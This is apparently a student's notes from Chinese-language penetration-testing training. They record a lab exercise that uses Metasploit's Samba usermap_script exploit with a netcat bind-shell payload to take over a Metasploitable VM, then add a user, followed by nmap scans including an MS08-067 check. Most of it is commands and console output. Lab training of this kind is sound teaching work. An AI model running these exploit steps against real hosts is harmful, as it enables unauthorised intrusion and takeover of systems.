渗透测试培训 3月13日
第一天:主要实验总结
首先利用struts2漏洞,可以直接执行任意命令,取得主机控制权。 实验环境:
KALI linux 作为攻击工具; owasp 作为靶机
2003 metaspoitable 实现能够成功访问
使用metaspliot完成对于靶机samba 服务的攻击,获取shell 权限 search samba 查找模块
Use multi/samba/usemap_script 选择渗透攻击模块 Show payloads 查看与该渗透模块相兼容的攻击载荷
Set payload cmd/unix/bind_netcat选择netcat工具在渗透攻击成功后执行shell Show options 查看需要设置的参数
Set RHOST 10.10.10.254 设置主机攻击主机 Exploit启动攻击
1、首先安装vm虚拟机程序,开启kali,owasp和metaspoitalbe等工具和搭建环境,使得网络可达,网络配置上选择nat模式,地址范围为10.10.10.0/24 2、开启kali虚机,进入root模式,
首先进入msfconsle,修改初始密码为123456 msf〉> passwd [*] exec: passwd
输入新的 UNIX 密码:
重新输入新的 UNIX 密码: passwd:已成功更新密码
然后寻找samba模块 msf > search samba
Matching Modules ================
Name Disclosure Date Rank Description ---- --------------- ---- -----------
auxiliary/admin/smb/samba_symlink_traversal normal Samba Symlink Directory Traversal
auxiliary/dos/samba/lsa_addprivs_heap normal Samba lsa_io_privilege_set Heap Overflow
auxiliary/dos/samba/lsa_transnames_heap normal Samba lsa_io_trans_names Heap Overflow
auxiliary/dos/samba/read_nttrans_ea_list normal Samba read_nttrans_ea_list Integer Overflow
exploit/freebsd/samba/trans2open 2003-04-07 great Samba trans2open Overflow (*BSD x86)
exploit/linux/samba/chain_reply 2010-06-16 good Samba chain_reply Memory Corruption (Linux x86)
exploit/linux/samba/lsa_transnames_heap 2007-05-14 good Samba lsa_io_trans_names Heap Overflow
exploit/linux/samba/setinfopolicy_heap 2012-04-10 normal Samba SetInformationPolicy AuditEventsInfo Heap Overflow
exploit/linux/samba/trans2open 2003-04-07 great Samba trans2open Overflow (Linux x86)
exploit/multi/samba/nttrans 2003-04-07 average Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow
exploit/multi/samba/usermap_script 2007-05-14 excellent Samba \map script\
exploit/osx/samba/lsa_transnames_heap 2007-05-14 average Samba lsa_io_trans_names Heap Overflow
exploit/osx/samba/trans2open 2003-04-07 great Samba trans2open Overflow (Mac OS X PPC)
exploit/solaris/samba/lsa_transnames_heap 2007-05-14 average Samba lsa_io_trans_names Heap Overflow
exploit/solaris/samba/trans2open 2003-04-07 great Samba trans2open Overflow (Solaris SPARC)
exploit/unix/misc/distcc_exec 2002-02-01 excellent DistCC Daemon Command Execution
exploit/unix/webapp/citrix_access_gateway_exec 2010-12-21 excellent Citrix Access Gateway Command Execution
exploit/windows/http/sambar6_search_results 2003-06-21 normal Sambar 6 Search Results Buffer Overflow
exploit/windows/license/calicclnt_getconfig 2005-03-02 average Computer Associates License Client GETCONFIG Overflow
post/linux/gather/enum_configs normal Linux Gather Configurations
msf > use multi/samba/usermap_script 选择渗透攻击模块
msf exploit(usermap_script) > show payloads 查看与该渗透模块相兼容的攻击载荷 Compatible Payloads ===================
Name Disclosure Date Rank Description ---- --------------- ---- -----------
cmd/unix/bind_awk normal Unix Command Shell, Bind TCP (via AWK)
cmd/unix/bind_inetd normal Unix Command Shell, Bind TCP (inetd) cmd/unix/bind_lua normal Unix Command Shell, Bind TCP (via Lua) cmd/unix/bind_netcat normal Unix Command Shell, Bind TCP (via netcat)
cmd/unix/bind_netcat_gaping normal Unix Command Shell, Bind TCP (via netcat -e)
cmd/unix/bind_netcat_gaping_ipv6 normal Unix Command Shell, Bind TCP (via netcat -e) IPv6
cmd/unix/bind_perl normal Unix Command Shell, Bind TCP (via Perl) cmd/unix/bind_perl_ipv6 normal Unix Command Shell, Bind TCP (via perl) IPv6
cmd/unix/bind_ruby normal Unix Command Shell, Bind TCP (via Ruby)
cmd/unix/bind_ruby_ipv6 normal Unix Command Shell, Bind TCP (via Ruby) IPv6
cmd/unix/bind_zsh normal Unix Command Shell, Bind TCP (via Zsh) cmd/unix/generic normal Unix Command, Generic Command Execution
cmd/unix/reverse normal Unix Command Shell, Double Reverse TCP (telnet)
cmd/unix/reverse_awk normal Unix Command Shell, Reverse TCP (via AWK)
cmd/unix/reverse_lua normal Unix Command Shell, Reverse TCP (via Lua)
cmd/unix/reverse_netcat normal Unix Command Shell, Reverse TCP (via netcat)
cmd/unix/reverse_netcat_gaping normal Unix Command Shell, Reverse TCP (via netcat -e)
cmd/unix/reverse_openssl normal Unix Command Shell, Double Reverse TCP SSL (openssl)
cmd/unix/reverse_perl normal Unix Command Shell, Reverse TCP (via Perl)
cmd/unix/reverse_perl_ssl normal Unix Command Shell, Reverse TCP SSL (via perl)
cmd/unix/reverse_php_ssl normal Unix Command Shell, Reverse TCP SSL (via php)
cmd/unix/reverse_python normal Unix Command Shell, Reverse TCP (via Python)
cmd/unix/reverse_python_ssl normal Unix Command Shell, Reverse TCP SSL (via python)
cmd/unix/reverse_ruby normal Unix Command Shell, Reverse TCP (via Ruby)
cmd/unix/reverse_ruby_ssl normal Unix Command Shell, Reverse TCP SSL (via Ruby)
cmd/unix/reverse_ssl_double_telnet normal Unix Command Shell, Double Reverse TCP SSL (telnet)
cmd/unix/reverse_zsh normal Unix Command Shell, Reverse TCP (via Zsh)
msf exploit(usermap_script) > set payload cmd/unix/bind_netcat 选择netcat工具在渗透攻击成功后执行shell payload => cmd/unix/bind_netcat
msf exploit(usermap_script) > show options 查看需要设置的参数
msf exploit(usermap_script) > set RHOST 10.10.10.254设置主机攻击主机 RHOST => 10.10.10.254
msf exploit(usermap_script) > exploit启动攻击
[*] Started bind handler
[*] Command shell session 1 opened (10.10.10.128:56558 -> 10.10.10.254:4444) at 2015-03-13 16:06:40 +0800 已经取得10.10.10.254机子的控制权,可以增加用户 useradd test 用户增加成功
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& 存活探测 -PU -sn UDP ping不列服务,-Pn不适用ping
nmap -sS -Pn xx.xx.xx.xx tcp syn 扫描 不发送icmp namp -sV -Pn xx.xx.xx.xx 列出服务详细信息
namp -PO -script=smb-check-vulns xx.xx.xx.xx 查找ms-08067漏洞
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
nmap 网站扫描
msf > nmap
msf > nmap -sV -Pn 10.10.10.254 [*] exec: nmap -sV -Pn 10.10.10.254
Starting Nmap 6.46 ( ) at 2015-03-13 16:38 CST Nmap scan report for 10.10.10.254 Host is up (0.00020s latency).
All 1000 scanned ports on 10.10.10.254 are filtered MAC Address: 00:50:56:E7:1B:31 (VMware)
Service detection performed. Please report any incorrect results at . Nmap done: 1 IP address (1 host up) scanned in 22.84 seconds
msf > nmap -PO -script=smb-check-vulns 10.10.10.254 [*] exec: nmap -PO -script=smb-check-vulns 10.10.10.254
Starting Nmap 6.46 ( ) at 2015-03-13 16:47 CST Nmap scan report for 10.10.10.254 Host is up (0.00021s latency).
All 1000 scanned ports on 10.10.10.254 are filtered MAC Address: 00:50:56:E7:1B:31 (VMware)
map done: 1 IP address (1 host up) scanned in 23.06 seconds